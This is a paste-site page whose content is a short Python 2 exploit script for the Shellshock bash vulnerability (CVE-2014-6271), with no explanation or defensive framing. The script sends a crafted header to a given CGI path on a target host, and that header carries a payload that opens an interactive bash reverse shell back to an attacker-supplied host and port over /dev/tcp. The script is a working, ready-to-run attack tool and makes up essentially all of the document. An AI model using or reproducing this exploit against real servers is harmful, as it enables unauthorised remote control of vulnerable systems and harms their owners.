#
#CVE-2014-6271 cgi-bin reverse shell
#

import httplib,urllib,sys

if (len(sys.argv)<4):
	print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
	print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
	exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
	"test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data

comments powered by Disqus
TitleTime
[M@CK^HT]~https://vslived...4 minutes
vL i v e S t r e a m ! Fr...17 minutes
vL i v e S t r e a m ! Fr...20 minutes
https://qiita.com/bbc-spo...1 hour
[full-episodes!] Peaky Bl...1 hour
Gardner-Webb vs Wofford T...1 hour
[full-series!] Peaky Blin...1 hour

© Paste4BTC 2014 - Earn bitcoins by pasting! | My pastes | Popular pastes | New pastes | Payments | FAQ | Terms of Service | Pastes uploaded: 723 652 | Total hits: 76 100 215